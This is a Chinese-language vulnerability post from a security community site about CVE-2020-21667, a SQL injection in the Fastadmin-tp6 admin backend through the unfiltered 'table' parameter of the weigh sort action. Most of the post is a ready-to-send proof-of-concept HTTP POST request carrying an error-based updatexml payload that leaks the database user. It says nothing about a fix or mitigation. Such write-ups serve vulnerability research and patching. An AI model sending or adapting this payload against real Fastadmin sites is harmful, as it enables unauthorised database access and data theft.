Fastadmin-tp6 后台SQL注入漏洞CVE-2020-21667

当后台有管理员权限的用户登录后,可以通过构造恶意数据在排序时进行SQL注入。
在文件app/admin/controller/Ajax.php145行,这里传入的'table'参数没有被过滤,所以我们可以传递一个恶意参数进行SQL注入。
POC

POST /admin/ajax/weigh HTTP/1.1
Host: ***.***
Connection: close
Content-Length: 122
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


ids=1&changeid=8&pid=3&field=weigh&orderway=desc&table=user_rule where if(1=2,1,updatexml(1,concat(0x7e,user(),0x7e),1))--

图片[1]-Fastadmin-tp6 后台SQL注入漏洞CVE-2020-21667-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞7赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像市王0